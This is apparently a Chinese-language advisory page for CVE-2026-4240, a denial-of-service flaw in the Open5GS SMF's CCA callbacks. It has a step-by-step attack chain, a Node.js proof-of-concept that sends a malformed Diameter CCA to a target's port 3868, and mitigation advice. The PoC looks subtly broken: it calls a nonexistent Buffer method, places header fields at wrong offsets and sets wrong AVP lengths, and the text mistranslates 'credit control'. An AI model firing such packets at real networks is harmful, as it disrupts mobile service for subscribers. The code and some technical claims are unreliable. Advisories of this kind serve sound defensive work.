CVE-2026-4240 Open5GS CCA Handler拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-4240

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

CVE-2026-4240是Open5GS（开源5G核心网实现）中的一个拒绝服务漏洞。该漏洞存在于Open5GS 2.7.6及之前版本的CCA Handler组件中，影响了多个关键回调函数，包括smf_gx_cca_cb、smf_gy_cca_cb、smf_s6b_aaa_cb和smf_s6b_sta_cb。攻击者可以通过构造特定的CCA（Credit Control Answer）消息来触发这些函数中的缺陷，导致服务中断或系统崩溃。由于该漏洞可远程利用且无需认证，攻击者可以在不获取任何凭据的情况下发起攻击，对5G核心网络的可用性造成严重影响。该漏洞已于2026年3月16日公开披露，厂商已在2.7.7版本中修复此问题。Open5GS作为开源的5G核心网解决方案，被广泛应用于电信运营商、研究机构和企业的5G网络部署中，因此该漏洞可能影响大量生产环境。

技术细节

该漏洞位于Open5GS的SMF（Session Management Function）模块的CCA Handler中，具体涉及Gx和Gy接口的信用卡控制回调函数以及S6b接口的认证和授权回调函数。攻击者通过向目标Open5GS SMF组件发送精心构造的CCA响应消息，利用这些回调函数中的内存管理错误或状态处理缺陷，导致空指针解引用、内存损坏或断言失败等异常情况，最终造成服务进程的崩溃。由于Gx接口用于PCRF（策略与计费规则功能）与PCEF之间的通信，Gy接口用于在线计费系统通信，S6b接口用于AAA服务器通信，攻击者可以通过拦截或伪造这些接口的响应消息来触发漏洞。在未修复的版本中，这些回调函数缺乏对异常响应数据的充分验证，攻击者可以利用这一点构造包含畸形数据字段的CCA消息，如错误的Result-Code、Invalid CCR-Flag或异常的状态码，导致处理逻辑进入错误分支并触发拒绝服务条件。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Open5GS部署，获取SMF组件的IP地址和Gx/Gy/S6b接口端口

STEP 2

步骤2: 构造恶意数据包

攻击者构造包含畸形AVP字段的Diameter CCA消息，如设置无效的Result-Code或异常的状态标识

STEP 3

步骤3: 发送攻击载荷

通过UDP/TCP协议向Open5GS SMF的Diameter端口（默认3868）发送恶意CCA响应消息

STEP 4

步骤4: 触发漏洞

SMF组件接收到恶意CCA后，调用smf_gx_cca_cb/smf_gy_cca_cb/smf_s6b_aaa_cb/smf_s6b_sta_cb回调函数处理，由于缺乏输入验证导致内存错误

STEP 5

步骤5: 服务崩溃

回调函数中的缺陷被触发，导致空指针解引用、内存损坏或断言失败，造成SMF进程崩溃

STEP 6

步骤6: 拒绝服务

SMF组件不可用，导致5G会话管理功能中断，影响用户设备的网络连接建立和维持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-4240 PoC - Open5GS CCA Handler DoS
// This PoC demonstrates sending a malicious CCA message to trigger the vulnerability

const dgram = require('dgram');
const crypto = require('crypto');

// Diameter message header structure
function buildDiameterHeader(version, length, flags, commandCode, applicationId) {
    const header = Buffer.alloc(20);
    header.writeUInt8(version, 0);
    header.writeUInt32BE(length, 1);
    header.writeUInt8(flags, 5);
    header.writeUInt24BE(commandCode, 6);
    header.writeUInt32BE(applicationId, 9);
    header.writeUInt32BE(0x01000000, 13); // Hop-by-Hop Identifier
    header.writeUInt32BE(0x01000000, 17); // End-to-End Identifier
    return header;
}

// Build malicious CCA message with malformed AVPs
function buildMalformedCCA() {
    const avps = [];
    
    // Result-Code AVP with invalid value
    const resultCodeAVP = Buffer.alloc(16);
    resultCodeAVP.writeUInt32BE(264, 0); // AVP Code
    resultCodeAVP.writeUInt32BE(0x40000000, 4); // Flags (mandatory)
    resultCodeAVP.writeUInt32BE(8, 8); // Length
    resultCodeAVP.writeUInt32BE(0xFFFFFFFF, 12); // Invalid Result-Code
    avps.push(resultCodeAVP);
    
    // Session-Id AVP
    const sessionId = '"' + crypto.randomBytes(16).toString('hex') + '"';
    const sessionIdAVP = Buffer.alloc(12 + sessionId.length);
    sessionIdAVP.writeUInt32BE(263, 0);
    sessionIdAVP.writeUInt32BE(0x40000000, 4);
    sessionIdAVP.writeUInt32BE(8 + sessionId.length, 8);
    sessionIdAVP.write(sessionId, 12);
    avps.push(sessionIdAVP);
    
    const payload = Buffer.concat(avps);
    const header = buildDiameterHeader(1, 20 + payload.length, 0x02, 272, 4); // CCA command
    
    return Buffer.concat([header, payload]);
}

// Send malicious CCA to target
function exploit(targetIP, targetPort) {
    const socket = dgram.createSocket('udp4');
    const maliciousCCA = buildMalformedCCA();
    
    socket.send(maliciousCCA, 0, maliciousCCA.length, targetPort, targetIP, (err) => {
        if (err) {
        console.error('Send error:', err);
        } else {
        console.log('Malicious CCA packet sent to', targetIP + ':' + targetPort);
        console.log('Packet length:', maliciousCCA.length, 'bytes');
        }
        socket.close();
    });
}

// Usage
// node cve-2026-4240-poc.js <target_ip> <port>
const targetIP = process.argv[2] || '127.0.0.1';
const targetPort = parseInt(process.argv[3]) || 3868;

exploit(targetIP, targetPort);
console.log('CVE-2026-4240 PoC execution started...');

影响范围

Open5GS < 2.7.7

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在网络边界部署Diameter防火墙或信令网关，对入站CCA消息进行严格验证，过滤异常格式的AVP；2) 启用Open5GS SMF的调试日志，监控smf_gx_cca_cb、smf_gy_cca_cb等函数的执行情况，及时发现异常；3) 实施Diameter消息完整性校验和源认证机制，确保CCA消息来自可信的PCRF/OCS/AAA服务器；4) 对Gx/Gy/S6b接口的通信配置IPSec或TLS加密，防止中间人攻击和消息篡改；5) 准备SMF组件的冗余部署，当主节点受到攻击时自动切换到备用节点。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4240
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4240
3 Details https://www.cvedetails.com/cve/CVE-2026-4240/
4 VulDB https://vuldb.com/cve/CVE-2026-4240
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/commit/80eb484a6ab32968e755e628b70d1a9c64f012ec
7 Link https://github.com/open5gs/open5gs/issues/4343
8 Link https://github.com/open5gs/open5gs/issues/4343#issue-4021871895
9 Link https://github.com/open5gs/open5gs/releases/tag/v2.7.7
10 Link https://vuldb.com/?ctiid.351182
11 Link https://vuldb.com/?id.351182
12 Link https://vuldb.com/?submit.771361